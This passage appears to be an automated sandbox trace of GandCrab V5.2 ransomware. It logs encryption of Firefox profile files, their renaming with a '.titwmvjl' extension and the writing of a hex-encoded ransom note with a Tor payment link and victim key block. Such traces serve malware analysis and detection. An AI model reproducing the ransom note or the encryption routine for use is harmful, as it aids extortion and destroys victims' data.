dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037f8) returned 1 [0084.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.471] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.471] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.471] GetLastError () returned 0x0 [0084.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.471] CryptDestroyKey (hKey=0x5037f8) returned 1 [0084.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.472] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.472] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0084.472] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.472] ReadFile (in: hFile=0x2e0, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259dfd0*=0x2a, lpOverlapped=0x0) returned 1 [0084.485] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffffd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.485] WriteFile (in: hFile=0x2e0, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259dfb4*=0x2a, lpOverlapped=0x0) returned 1 [0084.487] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.487] WriteFile (in: hFile=0x2e0, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0084.488] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.492] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.492] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.492] CloseHandle (hObject=0x2e0) returned 1 [0084.493] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2.titwmvjl"), dwFlags=0x1) returned 1 [0084.494] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.494] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.494] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.494] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.494] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock" [0084.494] lstrlenW (lpString=".titwmvjl") returned 9 [0084.494] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock") returned 129 [0084.494] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.494] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 138 [0084.494] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock") returned 129 [0084.494] lstrlenW (lpString=".lock") returned 5 [0084.494] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.495] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.495] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.495] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.495] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.495] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0084.495] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0084.495] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="idb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb" [0084.495] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\" [0084.495] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.495] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.496] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.496] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.496] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.496] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.496] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.496] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.497] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\\\TITWMVJL-DECRYPT.txt") returned 130 [0084.497] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0084.499] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5